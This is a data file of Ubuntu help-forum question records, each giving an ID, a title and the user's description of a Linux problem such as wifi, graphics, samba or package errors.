376092	is my local area network accesible to others when sharing my internet connection ?	sometimes i share my internet connection with my neighbours via the network manager gui ( ubuntu 12.04 ) but there is something i am worried about ... is it sharing just the internet connection or is my home local network ( with all my pcs , shared folders , smartphones , network printers and other devices ) somehow exposed too ? my local network has a 192.168.1.x range while the shared connection is in the range 10.x.x.x but , what happens if my neighbour changes his ip to one in my range ? is there a bridge ? or is he going to be alone in that range because i 'm just sharing the internet and nothing more ?
376094	compiz problem in ubuntu 13.10 , ghostly stripes at the cube effect , how can i fix it ?	i have installed ubuntu 13.10 version on my pc but when i install and enable compiz desktop cube and try to turn it , there starts the problem , you see many ghostly stripes , unable to enjoy the cube effect . something like that ( this is not my picture ) http : //www.udonet.com/laura/files/weird_desktop_effects.png i tried many drivers , the free one and the privatives that appear in the list . how can i fix it ? this is my pc : apu a8 5600k x4 3,6ghz mother asrock a55m-dgs ddr 3 8 gb kingston hdd 1 tb toshiba i will be grateful for your help ! ! ! excuse my english i 'm from uruguay he instalado ubuntu versión 13.10 en mi pc pero cuando instalo y activo el cubo de escritorio compiz , se inicia el problema , se ven muchas rayas espectrales , sin poder disfrutar del efecto cubo . algo así ( no es mi foto ) http : //www.udonet.com/laura/files/weird_desktop_effects.png traté muchos drivers , los libres y los privativos que aparecen en la lista . ¿cómo puedo solucionarlo ? estaré muy agradecido con su ayuda ! ! ! los detalles de mi equipo están arriba ! ! !
376098	corrupted file system on dual hd/dual boot system	i have the following system set up : 2 drives , 1 tb each , one with windows 7 and the other with what used to be ubuntu 11.x after an update my system became corrupted and now the file system is apparently corrupt . the ubuntu drive is /dev/sda2 , the windows 7 is /dev/sda1 . i 've tried fsck /dev/sda2 -t ext3 and that does nothing . i 'm not sure what to do at this point . i do n't even mind wiping the /dev/sda2 drive clean , so it will at least accept a completely new installation of ubuntu . i just do n't know how to do that . please help . thank you
376102	kworker goes nuts after rtcwake suspend	i 'm trying to make my laptop into an alarm clock that plays the song that i want . i ran into a huge problem . i use the following command to suspend my system and wake up after an amount of time . sudo rtcwake -- mode mem -- seconds < seconds > everytime i do this , kworker/2:2 goes nuts . 387 root 20 0 0 0 0 r 100,8 0,0 1:08.92 kworker/2:2 kworker starts uing 100 % cpu and does n't stop . i have no idea what 's happening or why ... i 'm using ubuntu 13.10 on an asus n76v .
376103	how do i move from the desktop directory to my home directory ?	yesterday i was working with the terminal where i install the most programs and packages , but i needed to change the directory to desktop ( myusername @ hostname-desktop : ~ $ ) and i did good , but now i want to change back to ( myusername @ hostname : ~ $ ) i ca n't put it like it was before , because now its in desktop directory and cant do nothing personal to the system .
376104	kde freeze with ubuntu13.10	i have a new installation of ubuntu 13.10 on a lenovo laptop , for which i decided to install kde . after i logged out and in and choosing kde plasma workspace , all worked fine . but later , when i log into kde plasma workspace , its loads normally , and i see the choosen background and the standard kde panel at the bottom of the screen . i can move the mouse around , but that 's it . i can not do anything else . klicking on anything or typing does not do anything , all is frozen . i have to power the laptop off the hard way ! i tried several times , without any luck of able to use kde . logging in to the ubuntu standard desktop , on the other hand , works just fine . how can i fix this behaviour ? please let me know any log entry , software installation , hardware device etc . you need to know in order to solve this problem ( and how i e.g . can figure out the type of graphics card or whatever ... ) . additional information : extract from kdm.log : loading extension glx klauncher ( 1266 ) kdemain : no dbus session-bus found . check if you have started the dbus server . kdeinit4 : communication error with launcher . exiting ! kdmgreet ( 1212 ) /kdecore ( k*timezone* ) : ksystemtimezones : ktimezoned initialize ( ) d-bus call failed : `` not connected to d-bus server '' the suggestion made here to press alt+shift+f12 did not help i also renamed each file containing the phrase plasma under .kde/share/config as suggested here , which also did not resolve my problem . the background image has changed and i saw two terminals open , but locked to the panel at the bottom . i could not open them . lspci -v shows the following for the graphics card : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 3977 flags : fast devsel , irq 16 memory at c0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 3000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features new user : if i add a new user , i am able to log-in to the kde desktop ( at least twice ) .
376105	thinkpad x1 carbon wo n't suspend after upgrade to 13.10	i upgraded to 13.10 and have since had problems with suspend when i close the laptop lid . prior to the upgrade , if you closed the lid it suspended the computer and all was well . after the upgrade closing the lid will result in the battery discharging ( if not plugged in ) and an aggravated user ! running ubuntu for years , but a little newbie on the power stuff .
376113	mounting external hard drive ext4 : `` the unlocked device does not have a reckognizable filesystem on it '' ?	i 'm having problems mounting ext4 partitions ( inside a luks partition ) in external drives . the drives are fine , there is no problem whatsoever with the drives and no filesystem corruption . this happened since a recent automatic system upgrade , and a manual upgrade to kernel 3.12.0 . it goes like this : i plug in the external drive passphrase is asked for luks device luks partition correctly unlocked/opened instead of proceding with mounting the now exposed ext4 partition there 's a pop-up saying : `` the unlocked device does not have a recognizable filesystem on it '' . same happens in this case : $ gvfs-mount -d /dev/sdc2 enter a passphrase to unlock the volume the passphrase is needed to access encrypted data on wdc wd250 ... ( 250 gb > hard disk ) . password : error mounting /dev/sdc2 : the unlocked device does not have a recognizable file system on it doing a manual sudo mount /dev/dm-1 /mnt/testfolder works with no errors and there is no problem with the filesystem ( fscked ) . also there doesnât seem to be anything useful written to dmesg when this happens . what gives ?
376115	permission issues	i 'm really struggling to access certain folders . i 'm assuming this is something to do with the filesystem . currently , i 'm unable to copy folders into the .config folder . any suggestions would be greatly appreciated .
376125	slow download rate hogging up the wifi	tl ; dr : on one computer , slow network connection consumes the entire bandwidth , affecting both internal wifi adapter and when browsing through a phone modem . comment : i posted this issue on super user several hours ago without any reply . i have ubuntu ( 13.10 and previously 13.04 ) and recently ( roughly for two months now ) download rates are very low , about ten percent of my connection . on the other machine ( elementaryos ) the download rate is fine . my common test is installing packages . at first i thought this was a wrong mirror issue , but i get the same rate when downloading podcasts ( mostly from podiobooks ) and isos from ubuntu servers . torrents are downloaded fine . what is bothering me even more , is that even at this low download rate , the wifi is clogged . this morning , i downloaded podcasts episodes ( again 10 percent of the bandwidth ) on the problematic machine , and i could n't even watch a youtube video on the other one . i have a 5mb/sec connection which is low , but it should be sufficient . even copying files over the wifi from one machine to the other hogs the network . several days ago i replaced the dns servers on the router from google 's to opendns . this helped for a couple of days but now the machine is back to its bad behavior . at first i thought that this could be an issue with my wifi card , but this time i connected my phone through usb and used its wifi with the same results . i should note that i disabled ipv6 . so , how do i diagnose this , where could the problem reside ? ** edit : ** lspci -nn | grep 0280 03:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) also , i think that the main event that triggered the drop in performance is that when i 'm at the office , i connect the laptop to an external screen and keyboard and i close the lid .
376128	unable to change display brightness with function keys or brightness and lock application in ubuntu 13.10	i am having problem with ubuntu 13.10 brightness control . my brightness shortcut keys ( fn + f5/f6 ) worked in 12.10 and 13.04 but they have stopped working in 13.10 . i am using sony vaio sve15113enb with vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) . any help is appreciated . i have tried following options , but none of them has worked so far : installing additional drivers from software centre finding /etc/x11/xorg.con file for editing but it does not exist for me . visited software & updates > additional drivers tab , but it shows nothing saying 'no additional drivers available ' and 'no proprietary drivers are in use ' . thanks in advance for any help .
376134	auto-refresh in the kde launcher	how to make kde launcher update every time new apps are installed ? now it 's not finding newly added ones .
376136	can not find highlight tool in adobe reader or okular	i use elementary os luna 64 bit . i 'm trying to get the pdf annotating tools for highlighting text on pdf documents . i tried adobe reader and okular . but both have n't that feature on my pc . but when i gogling i could see that both of those readers have that annotating feature . so what is the reason for that . is that a missing of plug in or something ?
376137	setting up wxwidgets 3.0 for codeblocks12.11 on ubuntu 12.04 ?	i already downloaded and installed codeblocks 12.11svn9156 . after that , i downloaded and compiled wxwidgets3.0 using make . when i go to codeblocks i do n't see wxwidgets3.0 in the wxwidget project wizard . also , the wizard prompts me wxsmith plugin is not loaded , can not continue i know some additional steps have to be done but i only found some confusing documentation .
376142	installation of lprng ( ubuntu 13.04 )	i have problems with lprng installation ( i am linux beginner ) . http : //lprng.com/lprng-reference/lprng-reference.html # installation - installation guide http : //lprng.com/printingcookbook/index.html # aen1563 could you write me here please , step by step , what i have to do ( write into terminal ) for succesful installation ? i 'm trying to do the first step of guide ( h4 : { 4 } % gunzip -c lprng- < version > .tgz | tar xvf - ) but unsuccessfuly . ( i put the source file to usr/bin , usr/sbin and usr/etc ) . i 'm desperate , help me please : ) thank you and sorry for my english
376143	ubuntu 12.04 graphics crashing when gvim opens tex files	i am having a little problem everytime when i open gvim to edit *.tex files . the menus die , windows jiggle ( maximize and minimize quickly ) and i get a internal error crash report from ubuntu ( 12.04 ) . it says the problem is at /usr/lib/unity/unity-panel-service . package : unity-services 5.20.0-0ubuntu2 problem : crash title : unity-panel-service crashed with sigsegv in g_main_context_dispatch ( ) any tips on how to solve this ? it might be related to the latex package of vim . also i get this message when i open gvim ( with or without tex files ) on terminal : ( gvim:5915 ) : gnome-warning ** : accessibility : failed to find module 'libgail-gnome ' which is needed to make this application accessible ( gvim:5915 ) : glib-gobject-warning ** : can not retrieve class for invalid ( unclassed ) type ` < invalid > ' i just checked it , that the issue is independant of theme . thanks a lot for your help !
376145	samba new file ownership , permissions configuration	i have recently installed samba on my server . now i have a question about permissions and how to set it up . currently i mount the samba shared drive to my laptop with this line in /etc/fstab : // < host > /share /mnt/melka-server-data/ cifs username= < usrname > password= < passwd > _netdev 0 0 this works , as i can read from the files and create them ( as root ) . the problem is when i want to create files as a regular user . i always get a permission denied error . these are ll outputs of the mounted folder : magicmaster @ magicmaster-kubuntu : /mnt $ ll total 8 drwxr-xr-x 3 root root 4096 lis 11 14:15 ./ drwxr-xr-x 26 root root 4096 říj 26 11:01 ../ drwxrwxrwx 8 magicmaster magicmaster 0 lis 12 22:12 melka-server-data/ and the inside : magicmaster @ magicmaster-kubuntu : /mnt/melka-server-data $ ll total 4 drwxrwxrwx 8 magicmaster magicmaster 0 lis 12 22:12 ./ drwxr-xr-x 3 root root 4096 lis 11 14:15 ../ drwxrwxrwx 5 magicmaster magicmaster 0 lis 12 09:35 downloads/ drwxrwxrwx 2 magicmaster magicmaster 0 říj 28 12:57 lost+found/ drwxrwxrwx 15 magicmaster magicmaster 0 lis 12 09:45 movies/ drwxrwxrwx 2 magicmaster magicmaster 0 lis 1 21:15 newest/ drwxrwxrwx 3 magicmaster magicmaster 0 lis 2 23:14 photos/ drwxrwxrwx 2 magicmaster magicmaster 0 říj 30 12:44 software/ -rw-r -- r -- 1 nobody nogroup 0 lis 12 22:12 zdar i called sudo chown -r magicmaster : magicmaster melka-server-data/ to try and change all the files to belong to me . then the file zdar was created by magicmaster just by calling touch . i got the permission denied , but it was still created , though it belongs to nobody and i ca n't write into it . when i create a file as root , it still belongs to nobody , but at least i can write into it . what am i missing ? i did n't notice anything in samba config that would be related to this and i do n't like the idea of having to log on as root in order to copy files.. thanks
376147	e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution )	i would like to upgrade to ubuntu 13.04 since almost a month now . am a pretty novice in linux and in software in general . my /boot is full : bijo @ bijo-amilo-xi-2428 : ~ $ df -h filesystem size used avail use % mounted on /dev/mapper/ubuntu-root 228g 7.7g 208g 4 % / udev 1001m 4.0k 1001m 1 % /dev tmpfs 404m 836k 403m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1008m 156k 1008m 1 % /run/shm none 100m 48k 100m 1 % /run/user /dev/sda1 228m 222m 0 100 % /boot i tried the : sudo apt-get purge $ ( dpkg -- list | grep -p -o `` linux-image-\d\s+ '' | grep -v $ ( uname -r | grep -p -o `` .+\d '' ) ) but i got this as reply e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) infact i 'm going round and round . can someone guide me through please ? thanks in advance for your time .
376152	ubuntu 12.04 restarts when i drag a firefox tab	when i drag a firefox tab to try to create a new window , my entire machine restarts and has me log in again and i have to restart any running programs . this also happens when i try to run binaries to install programs . latest it was thunderbird . does anyone have this issue ?
376159	cpu frequancy stuck at 1.20 ghz using tlp ?	i have installed tlp for power optimization on ubuntu 13.10 . instructions i start computer its running fine i can change the cpu frequencies to whatever i want , but after some time it stuck on minimum frequency 1.20 ghz , i cant change that to anything else . i have tried to stop it by using sudo tlp stop but it does n't stop . tried even to kill its process sudo killall tlp but it seems they have a different name of process of that so i am not sure what to do now . i reported to the linrunner but cant seem to find a solution
376164	configuring asus usb-n13 wireless driver without internet connection	i do n't have a wired internet connection on my desktop and i had a fresh install of ubuntu 12.04 lts right now . i bought an asus usb-n13 wireless adapter ; but although it recognizes my wireless network , it does not connect it somehow . it just gets in a loop when i try to connect . but it does not establish the connection . how can i find the proper driver and install it without internet connection on my desktop ? thank you community . i 'm pretty a newbie on linux so please consider it a bit . : )
376166	how to install a .tar.gz file	i downloaded a file called source_svr_linux_38037.tar.gz , how do i install it ? it 's the package for splashtop . i 'm pretty new to linux , so please explain with detail .
376168	installing ubuntu 13.10 from linuxmint on uefi acer aspire v5-123-12104g50nss	i would like to install ubuntu on an acer aspire v5-123-12104g50nss , but both uefi and legacy mode fails , and the notebook freezes during boot . i thought fglrx causes the problem , but i have the same issue using 'nomodeset ' at boot . i could only install linuxmint in legacy mode and made it uefi bootable , and installed the latest amd driver manually , which works properly , but i would like to install ubuntu instead . is there a way i could start an ubuntu-installer in linuxmint to install ubuntu properly ?
376172	installing blender on ubuntu	my version of blender is 2.69 , ubunto is 13.10 , processor i7 with nvidia 640 graphic card . i was running window , but changed my mind and want to use lunix , i just installed ubunto first time today morning , and whole day i had been searching net to install blender , i really dont know any thing about lunix , but i did install and followed as bellow found in the forum . sudo add-apt-repository ppa : irie/blender sudo apt-get update sudo apt-get install blender second command gives some error , as you can see i pasted here , but third one went ok and run well , after getting done message , i try to go to dash home and run from there , but as soon as i click on blender icon , just dash home disappears and nothing happens , same as before please help . shams @ ubuntu : ~ $ sudo apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? shams @ ubuntu : ~ $ sudo apt-get install blender reading package lists ... done building dependency tree reading state information ... done
376175	ubuntu install on external usb hard drive with ntdlr missing error	i am relatively new to ubuntu and have a desktop with windows 7 installed on it . i would like to install ubuntu onto a samsung external hard drive which i have connected via usb 3.0 . i have partitioned the 500 gb drive with 420 gb left in the ntfs format , a swap partition that is twice my ram ( which may be overkill ) , a fat32 parition of 20 gb for a shared portion , and a 20 gb ext4 partition for the boot . i have changed the bios setting to boot from my usb device first , but i keep getting an error that says `` ntldr missing '' . i appreciate any help anyone has on how to correct or fix the situation . i can explain more if there needs to be more detail .
376178	dual boot on seperate hard drives - windows 7 mbr and ubuntu gpt	my question is simple . i currently have windows 7 ( 64-bit ) installed on a ssd mbr partition . i also have a 3tb hdd that i am splitting between extra win-7 storage and what will hopefully be an ubuntu partition . the catch is that since the hdd is 3tb , it must be formatted as gpt . furthermore i would like to use the grub boot loader to give me the option of booting into windows or linux and have it reside on my ssd to take advantage of the speed . if it matters , i plan to install ubuntu via usb-flash drive . should this be as simple as installing ubuntu to a partition on my 3tb hdd drive and setting the bootloader device to install to my ssd ? i would like to know the probable results before attempting this .
376182	error occured when `` sudo apt-get update ''	messagebox said that unable to initialize package information . in the process of initializing the package information , unable to solve problem has occured . including the following error message : 'update-manager ' package , please report a bug : 'e : source list / etc / apt / sources.list the line 6 is incorrect ( dist parse ) ' it seem to be a some touble . how can i fix it ?
376187	kubuntu autostart program in a specific desktop	in the kubuntu system settings i can specify the programs that are to be autostarted . but can i specify which desktop they are to start on ? for instance , can i cause kmail to be autostarted on desktop 1 , firefox on desktop 2 , etc . ?
376194	rhythmbox grays and then crashes , but only if i click 'play ' from the tray	when i click on the rhythmbox 'play ' button in the sound tray when there is no current rhythmbox instance , it will open a new rhythmbox window , which will then gray out and a few seconds later crash , with an 'ubuntu report error ' dialogue . this only happens if i have not yet successfully started a rhythmbox instance since startup ( including instances that have actually been terminated ) and only happens with the play button ; starting it any other way does not lead to this issue . this issue only appeared after i upgraded to 13.10 from 13.04 . my rhythmbox version is 2.99.1 . how can i fix this ?
376197	problem with recursive rar archiving non-ascii filenames	say i want to create a backup of folder mainfolder 's content using rar . the command rar a backup.rar -r mainfolder does the job . but , if a subdirectory contains more than one file named with non-ascii ( ? ) characters , then only one of them is archived and the others get excluded . for example , consider the following directory hierarchy ( mainfolder , a and b are folders ; a , b , 你 and 好 are files ) +mainfolder +a -a -b -你 -好 +b -a -b -a -b -你 -好 then the command rar a backup.rar -r mainfolder skips mainfolder/a/好 mainfolder/好 while rar a backup.rar -r mainfolder/* still skips mainfolder/a/好 why is it so ? any help is greatly appreciated , thanks ! for the record , i already encountered some issues with non-ascii characters ( see this question ) that other linux distributions seem not to have . anyway , i use lubuntu 12.04 , terminal is lxterminal and echo $ bash_version returns 4.2.25 ( 1 ) -release . rar version is 4.00 beta 3 . another curiosity : right-clicking on the folder and selecting compress ... and then .rar still has the same problem . other options ( zip , tar ... ) behave correctly .
376199	'sudo su - ' vs 'sudo -i ' vs 'sudo /bin/bash ' - when does it matter which is used , or does it matter at all ?	when i 'm doing something that requires root be typed in dozens of times in a row , i prefer to switch my session to a root session . in the various tutorials and instructions i have used on the internet , i see sudo su , sudo su - , sudo -i and sudo /bin/bash being used to open a root session , but i 'm not clear on the difference between these and when or if that difference matters . can someone clear this up for me ?
376200	recover lvm without boot hdd	i have scoured the 'net for an answer and am here as a last resort ; i have a `` nas '' running ubuntu server . it boots from a 250g hdd and there are 4 x 1t hdds formatted as lvm . the boot hdd crashed and there is no backup the lvm has a backup but is a few days out of date . ideally i 'd like to recover the lvm hdds . is there a relatively simple way to do that ?
376201	gnome tweak tool completely not working	i booted my computer up today and found that my gnome shell theme was gone , along with all my extensions and gtk window themes . i opened up tweak tool , and sure enough they were all disabled , but enabling them did nothing . this all started after installing makerware from makerbot via the ppa listed on their site . every time i would run it , it would crash gnome and i would have to reboot and re-enable all the extensions , but that would always work . since that , i have installed some software from source , trying to get a ti 89 emulator working ( tiemu ) including ticables2 , ticalcs2 , libusb1.0 , libusb0.1 , and maybe more that i can not remember , so that could be related . i am running gnome shell 3.6 thanks in advance , let me know if you need anymore details i have forgotten .
376203	aid in knowing if ubuntu will function well of my pc	i have a hp pavilion g7 , and was wondering what exactly i should look for before installing ubuntu on it . ( dual-boot ) should ubuntu work o.k out of the box , and if not , what do i need to make sure to change ? i know these sorts of questions are generally annoying , because its usually lazy peeps who wo n't research stuff . i 'm doing my own research i just want to make sure i 'm not missing anything . thanks !
376204	bochs compiling error again	i 'm trying to compile bochs with this command : ./configure -- with-x11 -- with-wx -- enable-ne2000 -- enable-iodebug -- enable-disasm -- enable-debugger -- enable-e1000 -- enable-usb -- enable-pci it works , but then when i run make i got : usr/bin/ld : gui/libgui.a ( gtk_enh_dbg_osdep.o ) : undefined reference to symbol 'pthread_create @ @ glibc_2.2.5' /lib/x86_64-linux-gnu/libpthread.so.0 : error adding symbols : dso missing from command line any help ? : /
376205	how to download internet games	i want to know how to download games that are not on the store . it will not work when i click on the application
376210	how do i configure ubuntu server to access a wpa2 enterprise wifi access point ?	i am running ubuntu 13.10 server and would like to be able to access the wifi in my university using these setting . i have searched through numerous posts and found several configurations , none of which work . how do i get get this connection to work ? can this be done without without su privileges ? how do i extend this for multiple ssids - for home ( wpa2-personal ) and the university ( wpa2 enterprise ) ? network name or ssid ( case-sensitive ) : ttunet network security or authentication : wpa2 enterprise data encryption : aes eap type : peap/ms-chap-v2 when prompted for user credentials , use the following : user name : your eraider username password : your eraider password domain : ttu
376211	no sound on acer extensa 5635z ( ubuntu 13.10 )	after upgrading to ubutnu 13.10 i lost my sound card , i got only a dummy output in audio controller . i have tried many solution like reinstalling alsa , reload alsa ... .. but no luck here are some information : http : //www.alsa-project.org/db/ ? f=c630520b2fc60b6cb6bb1c005431cf1568690973 please help .
376217	how to install build dependencies for source not available in ubuntu repositories ?	i keep myself busy compiling ( makeing ) several packages and some of them are not in the repositories ( so apt-get build-dep does n't help ) , the complete documentation about build dependencies is missing or lacking , or i just do n't know what library is lacking . is there a way that i can just build something and if some header is missing it gets installed ?
376220	how to mount ramdrive in 13.10 for fast drive space	trying to mount ramdrive in 13.10 for fast drive space tmpfs /media/ramdisk tmpfs defaults , noatime , mode=1777 , nosuid , size=1600m 0 0 will not mount properly drive icon shows but will not open drive
376221	13.04 will not show up as an upgrade on my update manager	my update manager on 12.04 will not find the upgrade to 13.04 . i would like to know why i ca n't see it .
376229	chrome icon replaced by new tab - google chrome	i 'm new to ubuntu , just installed it on my chromebook a few days ago . so please forgive me . my problem is with google chrome . i have it installed and working , but when i open it and start browsing , a new icon appears in the launcher titled `` new tab - google chrome '' , which replaces the original chrome icon . when i click this new icon , it turns yellow and does nothing . i have rebooted the computer and reinstalled chrome , no fix . i can still open chrome from the terminal though . i would like to have an icon in the launcher that opens chrome . your help is much appreciated .
376232	alternative for virtual dj ?	i currently use mixxx on my system , but i am so much accustomed to the features and shortcut keys in virtual dj . does anybody know any good alternative for this software ?
376233	installing oracle java 7 as firefox ( v. 22 ) plugin fails	i have installed oracle java 7 jre under ubuntu 12.04 , and i am trying to get firefox ( v. 22 ) to recognize it as a plugin . i 've carefully followed these instructions : http : //sites.google.com/site/easylinuxtipsproject/java all goes well ; typing `` java -version '' at the command line turns up the correct ( newly installed ) jre . in addition to the above instructions , i 've also added sim links to the new libnpjp2.so in various places that firefox might be looking for plugins , beyond ~/.mozilla/plugins/ . however , firefox refuses to see it as a plugin . typing `` about : plugins '' in the url bar lists a bunch of plugins , but oracle java 7 jre is not among them . when i look at my pluginreg.dat file , the full path to the new shared object , which is /opt/java/32/jre1.7.0_45/lib/i386/libnpjp2.so is shown at the bottom of the file , in the [ invalid ] block . i even tried running the elaborate script given here http : //www.duinsoft.nl/packages.php ? t=en as an alternative method to install java 7 and get firefox to see it as a plugin , but i got the same result . interestingly , i have another ubuntu box , that one running 10.04 with firefox v. 20 instead of v. 22 , and the first method i mentioned goes without a hitch ( with firefox seeing the plugin ) . the oracle java install seems to be going fine . it 's getting firefox v. 22 to recognize the plugin that is not working . any suggestions or help would be warmly received .
376236	my ubuntu ca n't restart ; stoped there	my ubuntu os ca n't restart . following message comes : stoping system v runlevel compatibility stoping userspace bootsplash _ it stopped here . here , i have 2 questions : q1 : some items shows starting , some times show stoping , why they showed different ? q2 : how can i restart my ubantu 12.04 lts ? i have entered the recovery mode , but it shows a menu , i click almost all items , but it does n't work either . i am really confused .
376237	computer wo n't boot after grub options 13.1	in my computer , sometimes after selecting ubuntu from the grub menu , it does n't boot up , i will only see a black screen then a curser flashing at the top left . however , earlier , if i wait about 3 to 5 seconds and then press enter in the ubuntu option in the grub menu , it will boot . i 'm using ubuntu 13.10 , with an lvm encrypted hard drive . i have tried missing with the /etc/default/grub file , but nothing works . further , my computer didnt boot any linux cd at all , even after selecting from bios menu . it loads the cd , and then display a grey screen with the same curser . i finally had to install ubuntu 13.1o via usb drive . any information and answers you have ?
376240	what is the default audacious bit depth for pulseaudio output ?	i wonder what is normal bit depth for audacious player there are 16/24/32 bits available i tried them all seems fine . i use stereo output for my speakers and i wonder what bit depth be the best for stereo output so not to overload the hardware or some , right now i set it to 24 bits .
376244	ca n't access windos 7 os in ubuntu	when i try and access my windows 7 os i get the following memo and i have no idea what to make of the code . error mounting /dev/sda2 at /media/name/windows7_os : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/name/windows7_os '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . what should i do ?
376250	is there anything similar to unity tweaks for external displays ?	i just added an extra display to my ubuntu and it looks great , but how do i fine tune it ? i ca n't tell it exactly where to put all my files ( on my screen or on the other one ) and it 's just lacking features . what is there to help me with this ? i also have about four or five dots on the top of my regular laptop display , however i can live with that .
376251	problem on starting ubuntu	my problem is , i get a login screen , when i logged in , it display nothing than wallpaper . then i have to login to tty1 ( using ctrl+alt+f1 ) and start unity by using command $ unity . but i can not get top launcher running . and desktop is like classic . my question is : how can i make login automatic . ( as i have to do above steps all the times i start ubuntu ) how to get launchers or everything back to normal step .
376252	vlc ca n't read dvds even after i installed things to read them	moment ago and i got this from vlc media player playback failure : dvdread could not open the disc `` /dev/dvd '' . your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///dev/dvd ' . check the log for details . i typed this command to enable dvd playback , it worked on my desktop with ubuntu 13.10 sudo apt-get install gstreamer0.10-plugins-ugly gstreamer0.10-ffmpeg libxine1-ffmpeg gxine mencoder libdvdread4 totem-mozilla icedax tagtool easytag id3tool lame nautilus-script-audio-convert libmad0 mpg321 & & sudo /usr/share/doc/libdvdread4/install-css.sh i am using ubuntu 13.10 32-bit . thanks
376253	synaptic manager : not installed ( residual config ) safe to remove all ?	in synaptic manager i noticed i had a lot of packages in that list , and was wondering if any should n't be removed for some reason ? or if that is all safe to be removed . is it possible that some should be kept , or does that show useless packages that should be cleared ? i have ran sudo apt-get autoremove , but they are still there . ( also clean & autoclean ) thanks .
376255	editing files through file browser	this is probably a stupid questions based on how linux is designed . i do n't like editing files through command line . i could probably log in as root and use the file browser to open and edit files , but this is n't the best security practice . how if it is make a comparison ; edit files by opening them vs opening them via command line .
376256	could not connect to internet even after installing wvdial	after i start wvdial , i get the following lines $ sudo wvidal wvdial : internet dialer version 1.61 initializing modem . sending : atz ok sending : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 ok modem initialized . sending : atdt # 777 waiting for carrier . atdt # 777 connect 3100000 carrier detected . waiting for prompt . ~ [ 7f ] } # @ ! } ! } ! } } 8 } '' } & } } } } } # } $ @ # } % } & [ 7f ] } , h8 } ' } '' } ( } '' f_~ ppp negotiation detected . starting pppd at wed nov 13 07:16:38 2013 pid of pppd : 12638 using interface ppp0 pppd : `�9 [ 08 ] x�9 [ 08 ] pppd : `�9 [ 08 ] x�9 [ 08 ] pppd : `�9 [ 08 ] x�9 [ 08 ] pppd : `�9 [ 08 ] x�9 [ 08 ] local ip address 115.242.214.172 pppd : `�9 [ 08 ] x�9 [ 08 ] remote ip address 220.224.141.145 pppd : `�9 [ 08 ] x�9 [ 08 ] primary dns address 220.226.6.104 pppd : `�9 [ 08 ] x�9 [ 08 ] secondary dns address 220.226.100.40 pppd : `�9 [ 08 ] x�9 [ 08 ] this is my wvdial.conf file ; [ dialer defaults ] init1 = atz init2 = atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 modem type = analog modem baud = 9600 new pppd = yes modem = /dev/ttyusb0 isdn = 0 phone = # 777 password = 9382741646 username = 9382741646 is there any mistake in the config file ? should i do any thing after i run wvdial in terminal to get the internet to work ?
376257	hp pavilion 15 with amd dual graphics - ubuntu live environment not starting	i 've had this laptop for about a day now and have decided to try ubuntu on it and determine if i want to install it . i created a usb , it booted ( secure boot was on , i tried with secure boot off to no effect ) , and then the problem occurred . the screen turned off for a second , turned back on to a black screen , shut off again and turned back on with a dialogue box telling me that the system had to use low-graphics mode . i clicked ok , selected low-graphics mode from the menu and clicked ok . the screen switched to the boot messages and did not go any further than this . ctrl+alt+del started rebooting the laptop though . i tried booting again , but this time i edited the boot options in grub to add nomodeset . this time , the laptop only booted to a black screen . ctrl+alt+f2 took me to a prompt , i tried startx from there , but x did n't start , complaining that it wanted kernel mode setting back . i can not seem to find any option to disable one graphics chip or the other in the uefi setup menus . laptop : hp pavilion 15-e004au . the cpu : amd a6-4400m apu with radeon ( tm ) hd graphics the graphics chip : amd radeon hd 7520g + 8670m dual graphics . the ubuntu version : 13.10 , 64 bit . thanks . edit : i tried 12.04.3 lts , it managed to bring the desktop up . there are severe graphics glitches after about two minutes though .
376258	13.04 changed user id . how can i fix a login loop ?	i 'm trying to have an ubuntu user that is hidden from the user lists . per suggestions found here , i changed the user id to < 500 . once i did that , i am now getting a login loop on that user only . how might i fix this loop ? this user does have an encrypted home directory .
376259	failure to connect to wireless - 13.10	i installed 13.10 in dualboot on my alienware x51 ( i know , too expensive , should have built it myself , i would but i do n't have the time . ) after a bit of tampering ( stable version would not work ) , i got it to work . except for wi-fi . at first , a password promt would appear , i would enter the password , it would try to connect , fail , prompt again ... it even `` bled '' onto windows which would fail to see any network . i fixed the problem on win , and wi-fi began to work on ubuntu ... sort of . i would restart 3-4 times then get it to work . ( i did that twice ) then the problems stopped by themselves for 2 days . now , it 's back . but different . the prompt comes , i type my pw , it loads , fails , then disconnects and does not prompt again . hardware wise , the x51 is equipped with dell wireless 1550 , a bluetooth-wireless combo . i am honestly clueless about what to do . i 've tried most of the stuff i thought of ( not much ) and found online , to no avail . please help me . thank you .
